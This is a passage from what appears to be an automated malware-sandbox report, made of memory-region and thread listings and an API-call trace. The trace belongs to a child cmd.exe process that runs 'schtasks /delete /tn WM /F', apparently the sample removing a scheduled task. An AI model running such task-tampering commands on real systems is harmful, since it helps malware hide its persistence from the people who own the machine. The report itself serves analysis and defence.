"pagefile_0x0000000000400000" filename = "" Region: id = 6126 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6127 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6238 start_va = 0x9700000 end_va = 0x97fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009700000" filename = "" Region: id = 6239 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6240 start_va = 0x410000 end_va = 0x411fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 6245 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6278 start_va = 0x9800000 end_va = 0x98fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009800000" filename = "" Thread: id = 20 os_tid = 0x9c0 Thread: id = 21 os_tid = 0x998 Thread: id = 22 os_tid = 0x1118 Thread: id = 23 os_tid = 0xc40 Thread: id = 24 os_tid = 0x57c Thread: id = 25 os_tid = 0x13e8 Thread: id = 26 os_tid = 0x13e4 Thread: id = 27 os_tid = 0x10b8 Thread: id = 28 os_tid = 0x844 Thread: id = 29 os_tid = 0xd34 Thread: id = 30 os_tid = 0x5c4 Thread: id = 31 os_tid = 0x910 Thread: id = 32 os_tid = 0x3f0 Thread: id = 33 os_tid = 0x84 Thread: id = 34 os_tid = 0x224 Thread: id = 35 os_tid = 0x8f0 Thread: id = 36 os_tid = 0x1e0 Thread: id = 37 os_tid = 0x7f4 Thread: id = 38 os_tid = 0x918 Thread: id = 39 os_tid = 0xc08 Thread: id = 40 os_tid = 0x68c Thread: id = 41 os_tid = 0x944 Thread: id = 42 os_tid = 0x890 Thread: id = 43 os_tid = 0xbc0 Thread: id = 44 os_tid = 0xfa4 Thread: id = 45 os_tid = 0xb60 Thread: id = 46 os_tid = 0xfd8 Thread: id = 47 os_tid = 0xf94 Thread: id = 48 os_tid = 0xf8c Thread: id = 49 os_tid = 0xf3c Thread: id = 50 os_tid = 0xf10 Thread: id = 51 os_tid = 0xf08 Thread: id = 52 os_tid = 0xf04 Thread: id = 53 os_tid = 0xefc Thread: id = 54 os_tid = 0xedc Thread: id = 55 os_tid = 0xed0 Thread: id = 56 os_tid = 0xe8c Thread: id = 57 os_tid = 0xe78 Thread: id = 58 os_tid = 0xe74 Thread: id = 59 os_tid = 0xe3c Thread: id = 60 os_tid = 0xe10 Thread: id = 61 os_tid = 0xddc Thread: id = 62 os_tid = 0xdb0 Thread: id = 63 os_tid = 0xd64 Thread: id = 64 os_tid = 0xd44 Thread: id = 65 os_tid = 0x534 Thread: id = 66 os_tid = 0x8c4 Thread: id = 67 os_tid = 0x6c4 Thread: id = 68 os_tid = 0x8bc Thread: id = 69 os_tid = 0x8b8 Thread: id = 70 os_tid = 0x874 Thread: id = 71 os_tid = 0x870 Thread: id = 72 os_tid = 0x854 Thread: id = 73 os_tid = 0x850 Thread: id = 74 os_tid = 0x83c Thread: id = 75 os_tid = 0x834 Thread: id = 76 os_tid = 0x824 Thread: id = 77 os_tid = 0x558 Thread: id = 78 os_tid = 0x628 Thread: id = 79 os_tid = 0x568 Thread: id = 80 os_tid = 0x4cc Thread: id = 81 os_tid = 0x474 Thread: id = 82 os_tid = 0x404 Thread: id = 83 os_tid = 0x164 Thread: id = 84 os_tid = 0x7f8 Thread: id = 85 os_tid = 0x7bc Thread: id = 86 os_tid = 0x424 Thread: id = 87 os_tid = 0x730 Thread: id = 88 os_tid = 0x6e8 Thread: id = 89 os_tid = 0x694 Thread: id = 90 os_tid = 0x690 Thread: id = 91 os_tid = 0x668 Thread: id = 92 os_tid = 0x648 Thread: id = 93 os_tid = 0x604 Thread: id = 94 os_tid = 0x5f0 Thread: id = 95 os_tid = 0x5e4 Thread: id = 96 os_tid = 0x4e0 Thread: id = 97 os_tid = 0x468 Thread: id = 98 os_tid = 0x450 Thread: id = 99 os_tid = 0x438 Thread: id = 100 os_tid = 0x434 Thread: id = 101 os_tid = 0x430 Thread: id = 102 os_tid = 0x3d8 Thread: id = 103 os_tid = 0x280 Thread: id = 104 os_tid = 0x170 Thread: id = 105 os_tid = 0x210 Thread: id = 106 os_tid = 0x16c Thread: id = 107 os_tid = 0x178 Thread: id = 108 os_tid = 0x190 Thread: id = 109 os_tid = 0x140 Thread: id = 110 os_tid = 0x120 Thread: id = 111 os_tid = 0x60 Thread: id = 112 os_tid = 0x3ec Thread: id = 113 os_tid = 0x94c Thread: id = 114 os_tid = 0x954 Thread: id = 115 os_tid = 0x958 Thread: id = 116 os_tid = 0x960 Thread: id = 182 os_tid = 0x43c Thread: id = 183 os_tid = 0xc98 Thread: id = 233 os_tid = 0x398 Thread: id = 234 os_tid = 0x1168 Thread: id = 270 os_tid = 0x8ac Thread: id = 271 os_tid = 0x908 Thread: id = 389 os_tid = 0xef0 Thread: id = 390 os_tid = 0x4d8 Thread: id = 391 os_tid = 0x13c8 Thread: id = 433 os_tid = 0x6a4 Thread: id = 449 os_tid = 0xba0 Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x343bb000" os_pid = "0xa08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"schtasks /delete /tn WM /F \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1104 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1105 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1106 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1107 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1108 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1109 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1110 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1111 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1112 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1113 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1114 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1115 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1116 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1117 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1118 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1119 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1120 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1121 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1122 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1123 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1124 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1125 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1126 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1127 start_va = 0x440000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1128 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1129 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1130 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1131 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1132 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1133 start_va = 0x510000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1134 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1135 start_va = 0x610000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1136 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1137 start_va = 0x750000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1138 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1139 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1140 start_va = 0x890000 end_va = 0xbc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 117 os_tid = 0xe88 [0141.925] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0141.925] __set_app_type (_Type=0x1) [0141.925] __p__fmode () returned 0x74974d6c [0141.925] __p__commode () returned 0x74975b1c [0141.925] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0141.926] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0141.926] GetCurrentThreadId () returned 0xe88 [0141.926] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe88) returned 0x78 [0141.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0141.927] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0141.927] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.939] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.939] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0141.940] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.940] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.940] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.940] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.940] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.940] GetConsoleOutputCP () returned 0x1b5 [0141.943] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0141.943] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0141.943] _get_osfhandle (_FileHandle=1) returned 0x13c [0141.943] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0141.943] _get_osfhandle (_FileHandle=1) returned 0x13c [0141.943] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0141.943] _get_osfhandle (_FileHandle=0) returned 0x130 [0141.943] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0141.943] GetEnvironmentStringsW () returned 0x517cc0* [0141.943] GetProcessHeap () returned 0x510000 [0141.943] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa1a) returned 0x5186e8 [0141.944] FreeEnvironmentStringsA (penv="A") returned 1 [0141.944] GetProcessHeap () returned 0x510000 [0141.944] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4) returned 0x510550 [0141.944] GetEnvironmentStringsW () returned 0x517cc0* [0141.944] GetProcessHeap () returned 0x510000 [0141.944] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa1a) returned 0x519110 [0141.944] FreeEnvironmentStringsA (penv="A") returned 1 [0141.944] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0141.944] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0141.944] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0141.944] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0141.944] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0141.944] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0141.944] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0141.944] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0141.944] RegCloseKey (hKey=0x88) returned 0x0 [0141.944] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0141.945] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0141.947] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0141.947] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0141.947] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0141.948] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0141.948] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0141.948] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0141.948] RegCloseKey (hKey=0x88) returned 0x0 [0141.948] time (in: timer=0x0 | out: timer=0x0) returned 0x623441fc [0141.948] srand (_Seed=0x623441fc) [0141.948] GetCommandLineW () returned="cmd.exe /c \"schtasks /delete /tn WM /F \"" [0141.948] GetCommandLineW () returned="cmd.exe /c \"schtasks /delete /tn WM /F \"" [0141.948] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0141.948] GetProcessHeap () returned 0x510000 [0141.948] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x210) returned 0x519b38 [0141.948] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x519b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0141.949] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0141.949] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0141.949] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.949] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.949] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.949] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.949] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.949] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.949] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.949] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.949] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.950] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.950] GetProcessHeap () returned 0x510000 [0141.950] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5186e8) returned 1 [0141.951] GetEnvironmentStringsW () returned 0x517cc0* [0141.951] GetProcessHeap () returned 0x510000 [0141.951] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa32) returned 0x51a790 [0141.951] FreeEnvironmentStringsA (penv="A") returned 1 [0141.952] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0141.952] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.952] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.952] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.952] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.952] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.952] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.952] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.952] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.952] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.953] GetProcessHeap () returned 0x510000 [0141.953] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x44) returned 0x5105c8 [0141.953] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0141.971] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0141.971] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0141.971] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x510618 [0141.971] FindClose (in: hFindFile=0x510618 | out: hFindFile=0x510618) returned 1 [0141.972] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x510618 [0141.972] FindClose (in: hFindFile=0x510618 | out: hFindFile=0x510618) returned 1 [0141.972] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0141.972] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x510618 [0141.972] FindClose (in: hFindFile=0x510618 | out: hFindFile=0x510618) returned 1 [0141.972] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0141.972] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0141.972] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0141.972] GetProcessHeap () returned 0x510000 [0141.973] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51a790) returned 1 [0141.973] GetEnvironmentStringsW () returned 0x517cc0* [0141.973] GetProcessHeap () returned 0x510000 [0141.973] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa76) returned 0x519d50 [0141.973] FreeEnvironmentStringsA (penv="=") returned 1 [0141.973] GetCurrentDirectoryW (in: nBufferLength=0x104, 